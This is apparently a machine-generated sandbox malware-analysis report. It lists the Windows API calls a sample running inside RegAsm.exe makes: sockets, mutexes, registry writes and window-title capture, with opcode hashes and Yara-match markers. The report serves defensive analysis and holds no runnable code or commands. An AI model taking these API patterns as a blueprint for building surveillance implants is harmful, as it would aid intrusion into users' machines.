                                                                  • Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1433 448566-44857a 1434 448587-4485a2 LoadLibraryExW 1433->1434 1435 44857c-448585 1433->1435 1437 4485a4-4485ad GetLastError 1434->1437 1438 4485cb-4485d1 1434->1438 1436 4485de-4485e0 1435->1436 1439 4485bc 1437->1439 1440 4485af-4485ba LoadLibraryExW 1437->1440 1441 4485d3-4485d4 FreeLibrary 1438->1441 1442 4485da 1438->1442 1443 4485be-4485c0 1439->1443 1440->1443 1441->1442 1444 4485dc-4485dd 1442->1444 1443->1438 1445 4485c2-4485c9 1443->1445 1444->1436 1445->1444
                                                                  APIs
                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
                                                                  • GetLastError.KERNEL32(?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LibraryLoad$ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 3177248105-0
                                                                  • Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                                                  • Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
                                                                  • Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                                                  • Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8
                                                                  APIs
                                                                  • socket.WS2_32(?,00000001,00000006), ref: 00404852
                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                                                    • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateEventStartupsocket
                                                                  • String ID: 0If
                                                                  • API String ID: 1953588214-1581255843
                                                                  • Opcode ID: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                                                                  • Instruction ID: 7af5cc85a36d800a693892934b5c0b91abe86707509305098cc6d5fca1b6a633
                                                                  • Opcode Fuzzy Hash: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                                                                  • Instruction Fuzzy Hash: 6E0171B1408B809ED7359F38A8456977FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                                                  APIs
                                                                  • getaddrinfo.WS2_32(00000000,00000000,00000000,0If,004750E4,00000000,00415188,00000000,00000001), ref: 00414F0B
                                                                  • WSASetLastError.WS2_32(00000000), ref: 00414F10
                                                                    • Part of subcall function 00414D86: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                                                    • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E17
                                                                    • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                                                    • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                                                    • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E76
                                                                    • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                                                    • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                                                    • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                  • String ID: 0If
                                                                  • API String ID: 1170566393-1581255843
                                                                  • Opcode ID: 6695e73d4224f512b623112065335d5dbc2e445aee0e7ca71efd6bc9c5f08a3e
                                                                  • Instruction ID: cadd3d9b0d0923a9352550a0b766658ea18523973fceddbfefdc7c35282954d4
                                                                  • Opcode Fuzzy Hash: 6695e73d4224f512b623112065335d5dbc2e445aee0e7ca71efd6bc9c5f08a3e
                                                                  • Instruction Fuzzy Hash: 9ED017322015316BD320A769AC01AFBAA9EDBD7771B16003BFA08D3210D6949C8282E8
                                                                  APIs
                                                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
                                                                  • GetLastError.KERNEL32 ref: 0040D083
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateErrorLastMutex
                                                                  • String ID: SG
                                                                  • API String ID: 1925916568-3189917014
                                                                  • Opcode ID: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
                                                                  • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
                                                                  • Opcode Fuzzy Hash: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
                                                                  • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519
                                                                  APIs
                                                                  • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                                                  • RegQueryValueExA.KERNEL32 ref: 004135E7
                                                                  • RegCloseKey.KERNEL32(?), ref: 004135F2
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValue
                                                                  • String ID:
                                                                  • API String ID: 3677997916-0
                                                                  • Opcode ID: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
                                                                  • Instruction ID: 357f89d7cd1c8cc036c5e31f86fe90e90b696c4569df010e686479b524d11f87
                                                                  • Opcode Fuzzy Hash: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
                                                                  • Instruction Fuzzy Hash: 5A01D676900228BBCF209B91DC09DEF7FBDDB84751F000066BB09E2240DA748E45DBA4
                                                                  APIs
                                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 00413714
                                                                  • RegQueryValueExA.KERNEL32 ref: 0041372D
                                                                  • RegCloseKey.KERNEL32(00000000), ref: 00413738
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValue
                                                                  • String ID:
                                                                  • API String ID: 3677997916-0
                                                                  • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                                  • Instruction ID: 3f277cad741e4f631881634228dfc272d65c1146f3ef4f3c344e6cfa7cb73972
                                                                  • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                                  • Instruction Fuzzy Hash: 1C018BB1400229FBDF216FA1DC04DEB3F38EF05751F004065BE08621A1D6358AA5DBA4
                                                                  APIs
                                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
                                                                  • RegQueryValueExA.KERNEL32 ref: 00413587
                                                                  • RegCloseKey.KERNEL32(?), ref: 00413592
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValue
                                                                  • String ID:
                                                                  • API String ID: 3677997916-0
                                                                  • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                  • Instruction ID: df0ca7b2621da3f23a966dc0a7f3323316399916f3769291e5945d4ebcba47cd
                                                                  • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                  • Instruction Fuzzy Hash: E8F01776900218FFDF109FA0DC05FEEBBBCEB04B11F1040A6BA09E6191E2359F54AB94
                                                                  APIs
                                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413516
                                                                  • RegQueryValueExA.KERNEL32 ref: 0041352A
                                                                  • RegCloseKey.KERNEL32(?), ref: 00413535
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValue
                                                                  • String ID:
                                                                  • API String ID: 3677997916-0
                                                                  • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                  • Instruction ID: ffaae2385a847085e6fb085aa4760e2a706d619ab1068a3de776aab9102a8dd7
                                                                  • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                  • Instruction Fuzzy Hash: 46E06D32801238FB9F204FA2DC0DDEB7F6CEF06FA2B000155BD0DA2112E2258E50E6E4
                                                                  APIs
                                                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                                                  • RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
                                                                  • RegCloseKey.KERNEL32(004660A4), ref: 004138AB
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseCreateValue
                                                                  • String ID:
                                                                  • API String ID: 1818849710-0
                                                                  • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                  • Instruction ID: 04a42b38e2882b978ed87177a7d0f50f8458418d63be9de7f69fe35b215911ab
                                                                  • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                  • Instruction Fuzzy Hash: 16E06572500318FBEF115F90DC05FEA7B6CDF04B52F1045A5BF09A6191D3358E549798
                                                                  APIs
                                                                  • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EDE9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Info
                                                                  • String ID:
                                                                  • API String ID: 1807457897-3916222277
                                                                  • Opcode ID: a85cb1b2b9373234b1d7ad287e33ad953b4b977bb3bdbd209019650f1141d576
                                                                  • Instruction ID: 44bbd8f54034b75cb3f6f6e84f1b5a7d7ac270184ed4e74474e217fcd589b3ab
                                                                  • Opcode Fuzzy Hash: a85cb1b2b9373234b1d7ad287e33ad953b4b977bb3bdbd209019650f1141d576
                                                                  • Instruction Fuzzy Hash: 74411E705043489AEF218F65CC84AF7BBB9FF45308F2408EEE59A87142D2399E45DF65
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _wcslen
                                                                  • String ID: pQG
                                                                  • API String ID: 176396367-3769108836
                                                                  • Opcode ID: 1f3b91536cece4da7108cf24afec647958326f81796985407c04b0a2ae37731c
                                                                  • Instruction ID: e6961f6084f98a1e57a9a6385a58e5d20214d93246a99e64d0d6a4ea431d93e1
                                                                  • Opcode Fuzzy Hash: 1f3b91536cece4da7108cf24afec647958326f81796985407c04b0a2ae37731c
                                                                  • Instruction Fuzzy Hash: 8111C3319002059BCB15EF65E8529EF7BB5EF54318B10013FF406A62E2EFB8AD05CB98
                                                                  APIs
                                                                  • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 00448C24
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: String
                                                                  • String ID: LCMapStringEx
                                                                  • API String ID: 2568140703-3893581201
                                                                  • Opcode ID: 0d5bd11df5ef9a2e9891dfdca4fac69d3ce43e49c64e471a80bfc951609a4a07
                                                                  • Instruction ID: 91dcaeff4e4508283399e99d6512adb219adb357de156da575c9a111b1dd59a7
                                                                  • Opcode Fuzzy Hash: 0d5bd11df5ef9a2e9891dfdca4fac69d3ce43e49c64e471a80bfc951609a4a07
                                                                  • Instruction Fuzzy Hash: 3F016532500209FBCF029F90DC01EEE7F62EF08351F10452AFE0925161CA3A8971AB99
                                                                  APIs
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044BF4F,-00000020,00000FA0,00000000,00467378,00467378), ref: 00448ACF
                                                                  Strings
                                                                  • InitializeCriticalSectionEx, xrefs: 00448A9F
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CountCriticalInitializeSectionSpin
                                                                  • String ID: InitializeCriticalSectionEx
                                                                  • API String ID: 2593887523-3084827643
                                                                  • Opcode ID: 682e35b38dfd5190380aa89288d85395b8b8c573abd287f9b51c67f13ec4e10f
                                                                  • Instruction ID: 658be74961f29c719de8c28810f5b4ff6aac6a213607643c1e3aaf487ccb6ecc
                                                                  • Opcode Fuzzy Hash: 682e35b38dfd5190380aa89288d85395b8b8c573abd287f9b51c67f13ec4e10f
                                                                  • Instruction Fuzzy Hash: 12F0E235640208FBCF019F51DC06EAE7F61EF48722F10816AFC096A261DE799D25ABDD
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Alloc
                                                                  • String ID: FlsAlloc
                                                                  • API String ID: 2773662609-671089009
                                                                  • Opcode ID: b059b7acde134c04013a83b120bbe810436e60e70eecf54d389d9c1387c32ac7
                                                                  • Instruction ID: c1fb2f6f3e96c04a711f36652bc0978b46922b6b0bac1ff16f6cb7e5114ce70e
                                                                  • Opcode Fuzzy Hash: b059b7acde134c04013a83b120bbe810436e60e70eecf54d389d9c1387c32ac7
                                                                  • Instruction Fuzzy Hash: 98E02B30640218E7D700AF65DC16A6EBB94CF48B12B20057FFD0557391DE786D0595DE
                                                                  APIs
                                                                  • try_get_function.LIBVCRUNTIME ref: 00438DA9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: try_get_function
                                                                  • String ID: FlsAlloc
                                                                  • API String ID: 2742660187-671089009
                                                                  • Opcode ID: 5196da0208b4c88d7e80b60f7c4aa489d06214170f9357b8a7661789506c7008
                                                                  • Instruction ID: 997240ade825b32cd49e327dc5ad0f79abc42783939d358afc793268dfa947f7
                                                                  • Opcode Fuzzy Hash: 5196da0208b4c88d7e80b60f7c4aa489d06214170f9357b8a7661789506c7008
                                                                  • Instruction Fuzzy Hash: 1FD05B31B8172866861036D56C02B99F654CB45BF7F14106BFF0875293999D581451DE
                                                                  APIs
                                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B7CA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: GlobalMemoryStatus
                                                                  • String ID: @
                                                                  • API String ID: 1890195054-2766056989
                                                                  • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                                  • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                                                                  • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                                  • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                                                                  APIs
                                                                    • Part of subcall function 0044ECEC: GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                                                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044EFBA,?,00000000), ref: 0044F18D
                                                                  • GetCPInfo.KERNEL32(00000000,0044EFBA,?,?,?,0044EFBA,?,00000000), ref: 0044F1A0
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CodeInfoPageValid
                                                                  • String ID:
                                                                  • API String ID: 546120528-0
                                                                  • Opcode ID: 0fcd41bea27e2464632381dc73460c859b02871e76ebf75d2761c723038ba765
                                                                  • Instruction ID: 3b7bf12515eb554c774b4e527f81d40cffab4a6430697902d987c8214247c1f3
                                                                  • Opcode Fuzzy Hash: 0fcd41bea27e2464632381dc73460c859b02871e76ebf75d2761c723038ba765
                                                                  • Instruction Fuzzy Hash: BB5116749002469EFB24CF76C8816BBBBE5FF41304F1444BFD08687251D6BE994ACB99
                                                                  APIs
                                                                    • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                    • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                    • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                    • Part of subcall function 0044F077: _abort.LIBCMT ref: 0044F0A9
                                                                    • Part of subcall function 0044F077: _free.LIBCMT ref: 0044F0DD
                                                                    • Part of subcall function 0044ECEC: GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                                                  • _free.LIBCMT ref: 0044EFD0
                                                                  • _free.LIBCMT ref: 0044F006
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _free$ErrorLast_abort
                                                                  • String ID:
                                                                  • API String ID: 2991157371-0
                                                                  • Opcode ID: 23ed7ce0d1312216544e861ed2cc667081b9de49bf4146cfd61311aa69b4ec7f
                                                                  • Instruction ID: 3a29b68b49955ca98559fee15c42126097606514ccea0e67eec2104835090475
                                                                  • Opcode Fuzzy Hash: 23ed7ce0d1312216544e861ed2cc667081b9de49bf4146cfd61311aa69b4ec7f
                                                                  • Instruction Fuzzy Hash: FD31D531904104BFFB10EB6AD440B9EB7E4FF40329F2540AFE5149B2A1DB399D45CB48
                                                                  APIs
                                                                  • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7,00000000), ref: 0044852A
                                                                  • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00448537
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AddressProc__crt_fast_encode_pointer
                                                                  • String ID:
                                                                  • API String ID: 2279764990-0
                                                                  • Opcode ID: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
                                                                  • Instruction ID: 198cd69cd453a5762926ca534f03dc7b1e1ac857a4a5158ec5eb6717dc05f104
                                                                  • Opcode Fuzzy Hash: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
                                                                  • Instruction Fuzzy Hash: C3113A37A00131AFEB21DE1CDC4195F7391EB80724716452AFC08AB354DF34EC4186D8
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                                                                  • Instruction ID: 20740d68f627359004b4f50e822579efa7e6dd26000e0d34fcfb16e84f8f3500
                                                                  • Opcode Fuzzy Hash: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                                                                  • Instruction Fuzzy Hash: 6EF0E2706042015BDB1C8B34CD60B2A36955B84315F288F3FF01AD61E0C73EC8918A0D
                                                                  APIs
                                                                  • GetForegroundWindow.USER32 ref: 0041BAB8
                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BACB
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Window$ForegroundText
                                                                  • String ID:
                                                                  • API String ID: 29597999-0
                                                                  • Opcode ID: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
                                                                  • Instruction ID: 4615795adb372a642f3ed3ff298372a60f443b3219566b47796808df054d69ed
                                                                  • Opcode Fuzzy Hash: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
                                                                  • Instruction Fuzzy Hash: CCE0D875A00328A7E720A7A49C4EFE5776CEB08701F0000EEBA18D71C2EAB4AD04C7E4
                                                                  APIs
                                                                    • Part of subcall function 00438D94: try_get_function.LIBVCRUNTIME ref: 00438DA9
                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40A
                                                                  • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0043A415
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                  • String ID:
                                                                  • API String ID: 806969131-0
                                                                  • Opcode ID: b65774da924b1ebf27bf40d163950e62dcf9712d149a04772a22db3bc715a471
                                                                  • Instruction ID: 13a2799ba917d8b657c14e130d7338f5d7a652e6d8bc03527a2a5cb893e190b1
                                                                  • Opcode Fuzzy Hash: b65774da924b1ebf27bf40d163950e62dcf9712d149a04772a22db3bc715a471
                                                                  • Instruction Fuzzy Hash: 23D0A920088310241C14A3792C0F19B53442A3A7BCF70726FFAF4861C3EEDC8062612F
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __alldvrm
                                                                  • String ID:
                                                                  • API String ID: 65215352-0
                                                                  • Opcode ID: 28369f91ca91e66110a0b1c9409ed0194f098364de9e422e31faff2ad6e8f38b
                                                                  • Instruction ID: 96d9d97d68b67d0c8e80b5665a39335b0ee5c72343be31c2f0b4d265a228e715
                                                                  • Opcode Fuzzy Hash: 28369f91ca91e66110a0b1c9409ed0194f098364de9e422e31faff2ad6e8f38b
                                                                  • Instruction Fuzzy Hash: 08012872950318BFDB24EF64C942B6E77ECEB0531DF10846FE48597240C6799D00C75A
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  • Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                                                  • Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
                                                                  • Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                                                  • Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF
                                                                  APIs
                                                                  • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Startup
                                                                  • String ID:
                                                                  • API String ID: 724789610-0
                                                                  • Opcode ID: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
